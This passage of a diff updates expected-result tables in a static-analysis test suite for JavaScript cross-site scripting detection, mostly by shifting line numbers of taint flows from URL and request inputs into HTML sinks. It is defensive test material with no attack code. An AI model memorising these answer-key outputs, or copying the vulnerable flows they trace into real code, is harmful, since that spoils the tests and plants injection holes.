.search | tst.js:181:9:181:42 | tainted | provenance | | +| tst.js:183:67:183:73 | tainted | tst.js:184:67:184:73 | tainted | provenance | | +| tst.js:184:67:184:73 | tainted | tst.js:188:35:188:41 | tainted | provenance | | +| tst.js:184:67:184:73 | tainted | tst.js:190:46:190:52 | tainted | provenance | | +| tst.js:184:67:184:73 | tainted | tst.js:191:38:191:44 | tainted | provenance | | +| tst.js:184:67:184:73 | tainted | tst.js:192:35:192:41 | tainted | provenance | | +| tst.js:184:67:184:73 | tainted | tst.js:220:35:220:41 | tainted | provenance | | +| tst.js:188:35:188:41 | tainted | tst.js:196:28:196:46 | this.state.tainted1 | provenance | | +| tst.js:190:46:190:52 | tainted | tst.js:197:28:197:46 | this.state.tainted2 | provenance | | +| tst.js:191:38:191:44 | tainted | tst.js:198:28:198:46 | this.state.tainted3 | provenance | | +| tst.js:192:35:192:41 | tainted | tst.js:202:32:202:49 | prevState.tainted4 | provenance | | +| tst.js:220:35:220:41 | tainted | tst.js:209:28:209:46 | this.props.tainted1 | provenance | | +| tst.js:220:35:220:41 | tainted | tst.js:222:20:222:26 | tainted | provenance | | +| tst.js:222:20:222:26 | tainted | tst.js:210:28:210:46 | this.props.tainted2 | provenance | | +| tst.js:222:20:222:26 | tainted | tst.js:224:23:224:29 | tainted | provenance | | +| tst.js:224:23:224:29 | tainted | tst.js:211:28:211:46 | this.props.tainted3 | provenance | | +| tst.js:224:23:224:29 | tainted | tst.js:225:23:225:29 | tainted | provenance | | +| tst.js:225:23:225:29 | tainted | tst.js:215:32:215:49 | prevProps.tainted4 | provenance | | +| tst.js:225:23:225:29 | tainted | tst.js:239:23:239:29 | tainted | provenance | | +| tst.js:231:39:231:55 | props.propTainted | tst.js:235:60:235:82 | this.st ... 
Tainted | provenance | | +| tst.js:239:23:239:29 | tainted | tst.js:231:39:231:55 | props.propTainted | provenance | | +| tst.js:269:9:269:29 | tainted | tst.js:272:59:272:65 | tainted | provenance | | +| tst.js:269:19:269:29 | window.name | tst.js:269:9:269:29 | tainted | provenance | | +| tst.js:285:9:285:16 | location | tst.js:286:10:286:10 | e | provenance | | +| tst.js:286:10:286:10 | e | tst.js:287:20:287:20 | e | provenance | | +| tst.js:292:10:292:17 | location | tst.js:294:10:294:10 | e | provenance | | +| tst.js:294:10:294:10 | e | tst.js:295:20:295:20 | e | provenance | | +| tst.js:311:10:311:35 | new URL ... cation) [searchParams, MapValue] | tst.js:315:16:315:30 | getTaintedUrl() [searchParams, MapValue] | provenance | | +| tst.js:311:10:311:35 | new URL ... cation) [searchParams] | tst.js:315:16:315:30 | getTaintedUrl() [searchParams] | provenance | | +| tst.js:311:18:311:34 | document.location | tst.js:311:10:311:35 | new URL ... cation) [searchParams, MapValue] | provenance | | +| tst.js:311:18:311:34 | document.location | tst.js:311:10:311:35 | new URL ... cation) [searchParams] | provenance | | +| tst.js:315:7:315:43 | params | tst.js:316:18:316:23 | params | provenance | | +| tst.js:315:7:315:43 | params [MapValue] | tst.js:316:18:316:23 | params [MapValue] | provenance | | +| tst.js:315:16:315:30 | getTaintedUrl() [searchParams, MapValue] | tst.js:315:16:315:43 | getTain ... hParams [MapValue] | provenance | | +| tst.js:315:16:315:30 | getTaintedUrl() [searchParams] | tst.js:315:16:315:43 | getTain ... hParams | provenance | | +| tst.js:315:16:315:43 | getTain ... hParams | tst.js:315:7:315:43 | params | provenance | | +| tst.js:315:16:315:43 | getTain ... 
hParams [MapValue] | tst.js:315:7:315:43 | params [MapValue] | provenance | | +| tst.js:316:18:316:23 | params | tst.js:316:18:316:35 | params.get('name') | provenance | Config | +| tst.js:316:18:316:23 | params [MapValue] | tst.js:316:18:316:35 | params.get('name') | provenance | | +| tst.js:325:12:325:37 | new URL ... cation) [hash] | tst.js:327:5:327:12 | getUrl() [hash] | provenance | | +| tst.js:325:20:325:36 | document.location | tst.js:325:12:325:37 | new URL ... cation) [hash] | provenance | | +| tst.js:327:5:327:12 | getUrl() [hash] | tst.js:327:5:327:17 | getUrl().hash | provenance | | +| tst.js:327:5:327:17 | getUrl().hash | tst.js:327:5:327:30 | getUrl( ... ring(1) | provenance | Config | +| tst.js:332:7:332:39 | target | tst.js:333:12:333:17 | target | provenance | | +| tst.js:332:16:332:39 | documen ... .search | tst.js:332:7:332:39 | target | provenance | | +| tst.js:339:10:339:42 | target | tst.js:340:16:340:21 | target | provenance | | +| tst.js:339:10:339:42 | target | tst.js:341:20:341:25 | target | provenance | | +| tst.js:339:19:339:42 | documen ... .search | tst.js:339:10:339:42 | target | provenance | | +| tst.js:340:16:340:21 | target | tst.js:341:20:341:25 | target | provenance | | +| tst.js:341:20:341:25 | target | tst.js:344:21:344:26 | target | provenance | | +| tst.js:341:20:341:25 | target | tst.js:347:18:347:23 | target | provenance | | +| tst.js:355:7:355:39 | target | tst.js:357:18:357:23 | target | provenance | | +| tst.js:355:16:355:39 | documen ... 
.search | tst.js:355:7:355:39 | target | provenance | | +| tst.js:364:7:364:39 | target | tst.js:367:18:367:23 | target | provenance | | +| tst.js:364:7:364:39 | target | tst.js:369:18:369:23 | target | provenance | | +| tst.js:364:7:364:39 | target | tst.js:380:18:380:23 | target | provenance | | +| tst.js:364:7:364:39 | target | tst.js:389:18:389:23 | target | provenance | | +| tst.js:364:7:364:39 | target | tst.js:391:19:391:24 | target | provenance | | +| tst.js:364:16:364:39 | documen ... .search | tst.js:364:7:364:39 | target | provenance | | +| tst.js:369:18:369:23 | target | tst.js:369:18:369:29 | target.taint | provenance | | +| tst.js:374:3:374:8 | [post update] target [taint3] | tst.js:375:18:375:23 | target [taint3] | provenance | | +| tst.js:374:19:374:42 | documen ... .search | tst.js:374:3:374:8 | [post update] target [taint3] | provenance | | +| tst.js:375:18:375:23 | target [taint3] | tst.js:375:18:375:30 | target.taint3 | provenance | | +| tst.js:380:18:380:23 | target | tst.js:380:18:380:30 | target.taint5 | provenance | | +| tst.js:389:18:389:23 | target | tst.js:389:18:389:30 | target.taint7 | provenance | | +| tst.js:391:3:391:8 | [post update] target [taint8] | tst.js:391:19:391:24 | target [taint8] | provenance | | +| tst.js:391:3:391:8 | [post update] target [taint8] | tst.js:392:18:392:23 | target [taint8] | provenance | | +| tst.js:391:19:391:24 | target | tst.js:391:19:391:31 | target.taint8 | provenance | | +| tst.js:391:19:391:24 | target [taint8] | tst.js:391:19:391:31 | target.taint8 | provenance | | +| tst.js:391:19:391:31 | target.taint8 | tst.js:391:3:391:8 | [post update] target [taint8] | provenance | | +| tst.js:392:18:392:23 | target [taint8] | tst.js:392:18:392:30 | target.taint8 | provenance | | +| tst.js:399:7:399:46 | payload | tst.js:400:18:400:24 | payload | provenance | | +| tst.js:399:17:399:36 | window.location.hash | tst.js:399:17:399:46 | window. ... 
bstr(1) | provenance | | +| tst.js:399:17:399:36 | window.location.hash | tst.js:399:17:399:46 | window. ... bstr(1) | provenance | Config | +| tst.js:399:17:399:46 | window. ... bstr(1) | tst.js:399:7:399:46 | payload | provenance | | +| tst.js:402:7:402:55 | match | tst.js:404:20:404:24 | match | provenance | | +| tst.js:402:15:402:34 | window.location.hash | tst.js:402:15:402:55 | window. ... (\\w+)/) | provenance | | +| tst.js:402:15:402:55 | window. ... (\\w+)/) | tst.js:402:7:402:55 | match | provenance | | +| tst.js:404:20:404:24 | match | tst.js:404:20:404:27 | match[1] | provenance | | +| tst.js:407:18:407:37 | window.location.hash | tst.js:407:18:407:48 | window. ... it('#') [1] | provenance | Config | +| tst.js:407:18:407:48 | window. ... it('#') [1] | tst.js:407:18:407:51 | window. ... '#')[1] | provenance | | +| tst.js:411:7:411:39 | target | tst.js:413:18:413:23 | target | provenance | | +| tst.js:411:16:411:39 | documen ... .search | tst.js:411:7:411:39 | target | provenance | | +| tst.js:413:18:413:23 | target | tst.js:413:18:413:89 | target. ... data>') | provenance | | +| tst.js:419:6:419:38 | source | tst.js:423:28:423:33 | source | provenance | | +| tst.js:419:6:419:38 | source | tst.js:424:33:424:38 | source | provenance | | +| tst.js:419:6:419:38 | source | tst.js:425:34:425:39 | source | provenance | | +| tst.js:419:6:419:38 | source | tst.js:426:41:426:46 | source | provenance | | +| tst.js:419:6:419:38 | source | tst.js:427:44:427:49 | source | provenance | | +| tst.js:419:6:419:38 | source | tst.js:428:32:428:37 | source | provenance | | +| tst.js:419:15:419:38 | documen ... .search | tst.js:419:6:419:38 | source | provenance | | +| tst.js:436:7:436:39 | source | tst.js:438:18:438:23 | source | provenance | | +| tst.js:436:7:436:39 | source | tst.js:439:36:439:41 | source | provenance | | +| tst.js:436:16:436:39 | documen ... 
.search | tst.js:436:7:436:39 | source | provenance | | +| tst.js:439:36:439:41 | source | tst.js:439:18:439:42 | ansiToH ... source) | provenance | | +| tst.js:443:6:443:38 | source | tst.js:446:21:446:26 | source | provenance | | +| tst.js:443:6:443:38 | source | tst.js:448:19:448:24 | source | provenance | | +| tst.js:443:6:443:38 | source | tst.js:450:20:450:25 | source | provenance | | +| tst.js:443:15:443:38 | documen ... .search | tst.js:443:6:443:38 | source | provenance | | +| tst.js:454:7:454:46 | url | tst.js:456:19:456:21 | url | provenance | | +| tst.js:454:7:454:46 | url | tst.js:457:26:457:28 | url | provenance | | +| tst.js:454:7:454:46 | url | tst.js:458:25:458:27 | url | provenance | | +| tst.js:454:7:454:46 | url | tst.js:459:20:459:22 | url | provenance | | +| tst.js:454:7:454:46 | url | tst.js:469:22:469:24 | url | provenance | | +| tst.js:454:13:454:36 | documen ... .search | tst.js:454:13:454:46 | documen ... bstr(1) | provenance | Config | +| tst.js:454:13:454:46 | documen ... bstr(1) | tst.js:454:7:454:46 | url | provenance | | +| tst.js:474:23:474:35 | location.hash | tst.js:474:23:474:45 | locatio ... bstr(1) | provenance | Config | +| tst.js:477:18:477:30 | location.hash | tst.js:477:18:477:40 | locatio ... bstr(1) | provenance | Config | +| tst.js:484:43:484:62 | window.location.hash | tst.js:484:33:484:63 | decodeU ... n.hash) | provenance | | +| tst.js:491:7:491:39 | target | tst.js:492:18:492:23 | target | provenance | | +| tst.js:491:16:491:39 | documen ... .search | tst.js:491:7:491:39 | target | provenance | | +| tst.js:492:18:492:23 | target | tst.js:492:18:492:54 | target. ... "), '') | provenance | | | typeahead.js:9:28:9:30 | loc | typeahead.js:10:16:10:18 | loc | provenance | | | typeahead.js:20:13:20:45 | target | typeahead.js:21:12:21:17 | target | provenance | | | typeahead.js:20:22:20:45 | documen ... .search | typeahead.js:20:13:20:45 | target | provenance | | 
@@ -1248,18 +1248,18 @@ subpaths | optionalSanitizer.js:41:28:41:35 | tainted3 | optionalSanitizer.js:28:24:28:24 | x | optionalSanitizer.js:29:12:29:12 | x | optionalSanitizer.js:41:16:41:36 | sanitiz ... inted3) | | optionalSanitizer.js:45:41:45:46 | target | optionalSanitizer.js:28:24:28:24 | x | optionalSanitizer.js:29:12:29:12 | x | optionalSanitizer.js:45:29:45:47 | sanitizeBad(target) | | tooltip.jsx:18:51:18:57 | provide [source] | tooltip.jsx:23:38:23:43 | source | tooltip.jsx:23:38:23:43 | source | tooltip.jsx:18:51:18:59 | provide() | -| tst.js:40:20:40:43 | documen ... .search | tst.js:36:14:36:14 | x | tst.js:37:10:37:10 | x | tst.js:40:16:40:44 | baz(doc ... search) | -| tst.js:46:21:46:44 | documen ... .search | tst.js:42:15:42:15 | s | tst.js:43:10:43:31 | "
    " ...
    " | tst.js:46:16:46:45 | wrap(do ... search) | -| tst.js:54:21:54:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:54:16:54:45 | chop(do ... search) | -| tst.js:54:21:54:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:54:16:54:45 | chop(do ... search) | -| tst.js:54:21:54:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:54:16:54:45 | chop(do ... search) | -| tst.js:56:21:56:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:56:16:56:45 | chop(do ... search) | -| tst.js:56:21:56:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:56:16:56:45 | chop(do ... search) | -| tst.js:56:21:56:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:56:16:56:45 | chop(do ... search) | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:42:15:42:15 | s | tst.js:43:10:43:31 | "
    " ...
    " | tst.js:58:16:58:32 | wrap(chop(bar())) | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:42:15:42:15 | s | tst.js:43:10:43:31 | "
    " ...
    " | tst.js:58:16:58:32 | wrap(chop(bar())) | -| tst.js:58:26:58:30 | bar() | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:58:21:58:31 | chop(bar()) | -| tst.js:58:26:58:30 | bar() | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:58:21:58:31 | chop(bar()) | +| tst.js:34:20:34:43 | documen ... .search | tst.js:31:14:31:14 | x | tst.js:32:10:32:10 | x | tst.js:34:16:34:44 | baz(doc ... search) | +| tst.js:39:21:39:44 | documen ... .search | tst.js:36:15:36:15 | s | tst.js:37:10:37:31 | "
    " ...
    " | tst.js:39:16:39:45 | wrap(do ... search) | +| tst.js:46:21:46:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:46:16:46:45 | chop(do ... search) | +| tst.js:46:21:46:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:46:16:46:45 | chop(do ... search) | +| tst.js:46:21:46:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:46:16:46:45 | chop(do ... search) | +| tst.js:47:21:47:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:47:16:47:45 | chop(do ... search) | +| tst.js:47:21:47:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:47:16:47:45 | chop(do ... search) | +| tst.js:47:21:47:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:47:16:47:45 | chop(do ... search) | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:36:15:36:15 | s | tst.js:37:10:37:31 | "
    " ...
    " | tst.js:48:16:48:32 | wrap(chop(bar())) | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:36:15:36:15 | s | tst.js:37:10:37:31 | "
    " ...
    " | tst.js:48:16:48:32 | wrap(chop(bar())) | +| tst.js:48:26:48:30 | bar() | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:48:21:48:31 | chop(bar()) | +| tst.js:48:26:48:30 | bar() | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:48:21:48:31 | chop(bar()) | | various-concat-obfuscations.js:20:17:20:46 | documen ... h.attrs | various-concat-obfuscations.js:14:24:14:28 | attrs | various-concat-obfuscations.js:15:10:15:83 | '
    ' | various-concat-obfuscations.js:20:4:20:47 | indirec ... .attrs) | | various-concat-obfuscations.js:21:17:21:46 | documen ... h.attrs | various-concat-obfuscations.js:17:24:17:28 | attrs | various-concat-obfuscations.js:18:10:18:105 | '
    ') | various-concat-obfuscations.js:21:4:21:47 | indirec ... .attrs) | | various-concat-obfuscations.js:21:17:21:46 | documen ... h.attrs | various-concat-obfuscations.js:17:24:17:28 | attrs | various-concat-obfuscations.js:18:10:18:105 | '
    ') [ArrayElement] | various-concat-obfuscations.js:21:4:21:47 | indirec ... .attrs) | diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.expected b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.expected index 9e842ab516ed..d4678176df1b 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.expected +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.expected 
@@ -1,41 +1,41 @@ edges -| ReflectedXss.js:8:33:8:45 | req.params.id | ReflectedXss.js:8:14:8:45 | "Unknow ... rams.id | provenance | | -| ReflectedXss.js:17:31:17:39 | params.id | ReflectedXss.js:17:12:17:39 | "Unknow ... rams.id | provenance | | -| ReflectedXss.js:23:19:23:26 | req.body | ReflectedXss.js:23:12:23:27 | marked(req.body) | provenance | | -| ReflectedXss.js:42:31:42:38 | req.body | ReflectedXss.js:42:12:42:39 | convert ... q.body) | provenance | | -| ReflectedXss.js:64:14:64:21 | req.body | ReflectedXss.js:64:39:64:42 | file | provenance | | -| ReflectedXss.js:64:39:64:42 | file | ReflectedXss.js:65:16:65:19 | file | provenance | | -| ReflectedXss.js:68:12:68:41 | remark( ... q.body) | ReflectedXss.js:68:12:68:52 | remark( ... tring() | provenance | | -| ReflectedXss.js:68:33:68:40 | req.body | ReflectedXss.js:68:12:68:41 | remark( ... q.body) | provenance | | -| ReflectedXss.js:72:12:72:56 | unified ... q.body) | ReflectedXss.js:72:12:72:65 | unified ... oString | provenance | | -| ReflectedXss.js:72:48:72:55 | req.body | ReflectedXss.js:72:12:72:56 | unified ... q.body) | provenance | | -| ReflectedXss.js:74:20:74:27 | req.body | ReflectedXss.js:74:34:74:34 | f | provenance | | -| ReflectedXss.js:74:34:74:34 | f | ReflectedXss.js:75:14:75:14 | f | provenance | | -| ReflectedXss.js:84:22:84:29 | req.body | ReflectedXss.js:84:12:84:30 | snarkdown(req.body) | provenance | | -| ReflectedXss.js:85:23:85:30 | req.body | ReflectedXss.js:85:12:85:31 | snarkdown2(req.body) | provenance | | -| ReflectedXss.js:98:30:98:37 | req.body | ReflectedXss.js:98:12:98:38 | markdow ... q.body) | provenance | | -| ReflectedXss.js:100:31:100:38 | req.body | ReflectedXss.js:100:12:100:39 | markdow ... q.body) | provenance | | -| ReflectedXss.js:103:76:103:83 | req.body | ReflectedXss.js:103:12:103:84 | markdow ... 
q.body) | provenance | | -| ReflectedXss.js:114:11:114:41 | queryKeys | ReflectedXss.js:116:18:116:26 | queryKeys | provenance | | -| ReflectedXss.js:114:13:114:27 | keys: queryKeys | ReflectedXss.js:114:11:114:41 | queryKeys | provenance | | -| ReflectedXss.js:116:11:116:45 | keys | ReflectedXss.js:118:50:118:53 | keys | provenance | | -| ReflectedXss.js:116:11:116:45 | keys | ReflectedXss.js:118:58:118:61 | keys | provenance | | -| ReflectedXss.js:116:18:116:26 | queryKeys | ReflectedXss.js:116:11:116:45 | keys | provenance | | -| ReflectedXss.js:116:31:116:45 | paramKeys?.keys | ReflectedXss.js:116:11:116:45 | keys | provenance | | -| ReflectedXss.js:118:11:118:61 | keyArray | ReflectedXss.js:119:25:119:32 | keyArray | provenance | | -| ReflectedXss.js:118:11:118:61 | keyArray [0] | ReflectedXss.js:119:25:119:32 | keyArray [0] | provenance | | -| ReflectedXss.js:118:49:118:54 | [keys] [0] | ReflectedXss.js:118:11:118:61 | keyArray [0] | provenance | | -| ReflectedXss.js:118:50:118:53 | keys | ReflectedXss.js:118:49:118:54 | [keys] [0] | provenance | | -| ReflectedXss.js:118:58:118:61 | keys | ReflectedXss.js:118:11:118:61 | keyArray | provenance | | -| ReflectedXss.js:119:11:119:72 | invalidKeys | ReflectedXss.js:122:33:122:43 | invalidKeys | provenance | | -| ReflectedXss.js:119:11:119:72 | invalidKeys [0] | ReflectedXss.js:122:33:122:43 | invalidKeys [0] | provenance | | -| ReflectedXss.js:119:25:119:32 | keyArray | ReflectedXss.js:119:25:119:72 | keyArra ... s(key)) | provenance | | -| ReflectedXss.js:119:25:119:32 | keyArray [0] | ReflectedXss.js:119:25:119:72 | keyArra ... s(key)) [0] | provenance | | -| ReflectedXss.js:119:25:119:72 | keyArra ... s(key)) | ReflectedXss.js:119:11:119:72 | invalidKeys | provenance | | -| ReflectedXss.js:119:25:119:72 | keyArra ... s(key)) [0] | ReflectedXss.js:119:11:119:72 | invalidKeys [0] | provenance | | -| ReflectedXss.js:122:33:122:43 | invalidKeys | ReflectedXss.js:122:33:122:54 | invalid ... 
n(', ') | provenance | | -| ReflectedXss.js:122:33:122:43 | invalidKeys [0] | ReflectedXss.js:122:33:122:54 | invalid ... n(', ') | provenance | | -| ReflectedXss.js:122:33:122:54 | invalid ... n(', ') | ReflectedXss.js:122:30:122:73 | `${inva ... telist` | provenance | | +| ReflectedXss.js:7:33:7:45 | req.params.id | ReflectedXss.js:7:14:7:45 | "Unknow ... rams.id | provenance | | +| ReflectedXss.js:16:31:16:39 | params.id | ReflectedXss.js:16:12:16:39 | "Unknow ... rams.id | provenance | | +| ReflectedXss.js:22:19:22:26 | req.body | ReflectedXss.js:22:12:22:27 | marked(req.body) | provenance | | +| ReflectedXss.js:41:31:41:38 | req.body | ReflectedXss.js:41:12:41:39 | convert ... q.body) | provenance | | +| ReflectedXss.js:63:14:63:21 | req.body | ReflectedXss.js:63:39:63:42 | file | provenance | | +| ReflectedXss.js:63:39:63:42 | file | ReflectedXss.js:64:16:64:19 | file | provenance | | +| ReflectedXss.js:67:12:67:41 | remark( ... q.body) | ReflectedXss.js:67:12:67:52 | remark( ... tring() | provenance | | +| ReflectedXss.js:67:33:67:40 | req.body | ReflectedXss.js:67:12:67:41 | remark( ... q.body) | provenance | | +| ReflectedXss.js:71:12:71:56 | unified ... q.body) | ReflectedXss.js:71:12:71:65 | unified ... oString | provenance | | +| ReflectedXss.js:71:48:71:55 | req.body | ReflectedXss.js:71:12:71:56 | unified ... q.body) | provenance | | +| ReflectedXss.js:73:20:73:27 | req.body | ReflectedXss.js:73:34:73:34 | f | provenance | | +| ReflectedXss.js:73:34:73:34 | f | ReflectedXss.js:74:14:74:14 | f | provenance | | +| ReflectedXss.js:83:22:83:29 | req.body | ReflectedXss.js:83:12:83:30 | snarkdown(req.body) | provenance | | +| ReflectedXss.js:84:23:84:30 | req.body | ReflectedXss.js:84:12:84:31 | snarkdown2(req.body) | provenance | | +| ReflectedXss.js:97:30:97:37 | req.body | ReflectedXss.js:97:12:97:38 | markdow ... q.body) | provenance | | +| ReflectedXss.js:99:31:99:38 | req.body | ReflectedXss.js:99:12:99:39 | markdow ... 
q.body) | provenance | | +| ReflectedXss.js:102:76:102:83 | req.body | ReflectedXss.js:102:12:102:84 | markdow ... q.body) | provenance | | +| ReflectedXss.js:113:11:113:41 | queryKeys | ReflectedXss.js:115:18:115:26 | queryKeys | provenance | | +| ReflectedXss.js:113:13:113:27 | keys: queryKeys | ReflectedXss.js:113:11:113:41 | queryKeys | provenance | | +| ReflectedXss.js:115:11:115:45 | keys | ReflectedXss.js:117:50:117:53 | keys | provenance | | +| ReflectedXss.js:115:11:115:45 | keys | ReflectedXss.js:117:58:117:61 | keys | provenance | | +| ReflectedXss.js:115:18:115:26 | queryKeys | ReflectedXss.js:115:11:115:45 | keys | provenance | | +| ReflectedXss.js:115:31:115:45 | paramKeys?.keys | ReflectedXss.js:115:11:115:45 | keys | provenance | | +| ReflectedXss.js:117:11:117:61 | keyArray | ReflectedXss.js:118:25:118:32 | keyArray | provenance | | +| ReflectedXss.js:117:11:117:61 | keyArray [0] | ReflectedXss.js:118:25:118:32 | keyArray [0] | provenance | | +| ReflectedXss.js:117:49:117:54 | [keys] [0] | ReflectedXss.js:117:11:117:61 | keyArray [0] | provenance | | +| ReflectedXss.js:117:50:117:53 | keys | ReflectedXss.js:117:49:117:54 | [keys] [0] | provenance | | +| ReflectedXss.js:117:58:117:61 | keys | ReflectedXss.js:117:11:117:61 | keyArray | provenance | | +| ReflectedXss.js:118:11:118:72 | invalidKeys | ReflectedXss.js:121:33:121:43 | invalidKeys | provenance | | +| ReflectedXss.js:118:11:118:72 | invalidKeys [0] | ReflectedXss.js:121:33:121:43 | invalidKeys [0] | provenance | | +| ReflectedXss.js:118:25:118:32 | keyArray | ReflectedXss.js:118:25:118:72 | keyArra ... s(key)) | provenance | | +| ReflectedXss.js:118:25:118:32 | keyArray [0] | ReflectedXss.js:118:25:118:72 | keyArra ... s(key)) [0] | provenance | | +| ReflectedXss.js:118:25:118:72 | keyArra ... s(key)) | ReflectedXss.js:118:11:118:72 | invalidKeys | provenance | | +| ReflectedXss.js:118:25:118:72 | keyArra ... 
s(key)) [0] | ReflectedXss.js:118:11:118:72 | invalidKeys [0] | provenance | | +| ReflectedXss.js:121:33:121:43 | invalidKeys | ReflectedXss.js:121:33:121:54 | invalid ... n(', ') | provenance | | +| ReflectedXss.js:121:33:121:43 | invalidKeys [0] | ReflectedXss.js:121:33:121:54 | invalid ... n(', ') | provenance | | +| ReflectedXss.js:121:33:121:54 | invalid ... n(', ') | ReflectedXss.js:121:30:121:73 | `${inva ... telist` | provenance | | | ReflectedXssContentTypes.js:10:24:10:36 | req.params.id | ReflectedXssContentTypes.js:10:14:10:36 | "FOO: " ... rams.id | provenance | | | ReflectedXssContentTypes.js:20:24:20:36 | req.params.id | ReflectedXssContentTypes.js:20:14:20:36 | "FOO: " ... rams.id | provenance | | | ReflectedXssContentTypes.js:39:23:39:35 | req.params.id | ReflectedXssContentTypes.js:39:13:39:35 | "FOO: " ... rams.id | provenance | | 
@@ -144,63 +144,63 @@ edges | tst3.js:11:16:11:74 | prettie ... bel" }) | tst3.js:11:9:11:74 | code | provenance | | | tst3.js:11:32:11:39 | reg.body | tst3.js:11:16:11:74 | prettie ... bel" }) | provenance | | nodes -| ReflectedXss.js:8:14:8:45 | "Unknow ... rams.id | semmle.label | "Unknow ... rams.id | -| ReflectedXss.js:8:33:8:45 | req.params.id | semmle.label | req.params.id | -| ReflectedXss.js:17:12:17:39 | "Unknow ... rams.id | semmle.label | "Unknow ... rams.id | -| ReflectedXss.js:17:31:17:39 | params.id | semmle.label | params.id | -| ReflectedXss.js:22:12:22:19 | req.body | semmle.label | req.body | -| ReflectedXss.js:23:12:23:27 | marked(req.body) | semmle.label | marked(req.body) | -| ReflectedXss.js:23:19:23:26 | req.body | semmle.label | req.body | -| ReflectedXss.js:29:12:29:19 | req.body | semmle.label | req.body | -| ReflectedXss.js:41:12:41:19 | req.body | semmle.label | req.body | -| ReflectedXss.js:42:12:42:39 | convert ... q.body) | semmle.label | convert ... q.body) | -| ReflectedXss.js:42:31:42:38 | req.body | semmle.label | req.body | -| ReflectedXss.js:56:12:56:19 | req.body | semmle.label | req.body | -| ReflectedXss.js:64:14:64:21 | req.body | semmle.label | req.body | -| ReflectedXss.js:64:39:64:42 | file | semmle.label | file | -| ReflectedXss.js:65:16:65:19 | file | semmle.label | file | -| ReflectedXss.js:68:12:68:41 | remark( ... q.body) | semmle.label | remark( ... q.body) | -| ReflectedXss.js:68:12:68:52 | remark( ... tring() | semmle.label | remark( ... tring() | -| ReflectedXss.js:68:33:68:40 | req.body | semmle.label | req.body | -| ReflectedXss.js:72:12:72:56 | unified ... q.body) | semmle.label | unified ... q.body) | -| ReflectedXss.js:72:12:72:65 | unified ... oString | semmle.label | unified ... 
oString | -| ReflectedXss.js:72:48:72:55 | req.body | semmle.label | req.body | -| ReflectedXss.js:74:20:74:27 | req.body | semmle.label | req.body | -| ReflectedXss.js:74:34:74:34 | f | semmle.label | f | -| ReflectedXss.js:75:14:75:14 | f | semmle.label | f | -| ReflectedXss.js:83:12:83:19 | req.body | semmle.label | req.body | -| ReflectedXss.js:84:12:84:30 | snarkdown(req.body) | semmle.label | snarkdown(req.body) | -| ReflectedXss.js:84:22:84:29 | req.body | semmle.label | req.body | -| ReflectedXss.js:85:12:85:31 | snarkdown2(req.body) | semmle.label | snarkdown2(req.body) | -| ReflectedXss.js:85:23:85:30 | req.body | semmle.label | req.body | -| ReflectedXss.js:97:12:97:19 | req.body | semmle.label | req.body | -| ReflectedXss.js:98:12:98:38 | markdow ... q.body) | semmle.label | markdow ... q.body) | -| ReflectedXss.js:98:30:98:37 | req.body | semmle.label | req.body | -| ReflectedXss.js:100:12:100:39 | markdow ... q.body) | semmle.label | markdow ... q.body) | -| ReflectedXss.js:100:31:100:38 | req.body | semmle.label | req.body | -| ReflectedXss.js:103:12:103:84 | markdow ... q.body) | semmle.label | markdow ... 
q.body) | -| ReflectedXss.js:103:76:103:83 | req.body | semmle.label | req.body | -| ReflectedXss.js:110:16:110:30 | request.query.p | semmle.label | request.query.p | -| ReflectedXss.js:114:11:114:41 | queryKeys | semmle.label | queryKeys | -| ReflectedXss.js:114:13:114:27 | keys: queryKeys | semmle.label | keys: queryKeys | -| ReflectedXss.js:116:11:116:45 | keys | semmle.label | keys | -| ReflectedXss.js:116:18:116:26 | queryKeys | semmle.label | queryKeys | -| ReflectedXss.js:116:31:116:45 | paramKeys?.keys | semmle.label | paramKeys?.keys | -| ReflectedXss.js:118:11:118:61 | keyArray | semmle.label | keyArray | -| ReflectedXss.js:118:11:118:61 | keyArray [0] | semmle.label | keyArray [0] | -| ReflectedXss.js:118:49:118:54 | [keys] [0] | semmle.label | [keys] [0] | -| ReflectedXss.js:118:50:118:53 | keys | semmle.label | keys | -| ReflectedXss.js:118:58:118:61 | keys | semmle.label | keys | -| ReflectedXss.js:119:11:119:72 | invalidKeys | semmle.label | invalidKeys | -| ReflectedXss.js:119:11:119:72 | invalidKeys [0] | semmle.label | invalidKeys [0] | -| ReflectedXss.js:119:25:119:32 | keyArray | semmle.label | keyArray | -| ReflectedXss.js:119:25:119:32 | keyArray [0] | semmle.label | keyArray [0] | -| ReflectedXss.js:119:25:119:72 | keyArra ... s(key)) | semmle.label | keyArra ... s(key)) | -| ReflectedXss.js:119:25:119:72 | keyArra ... 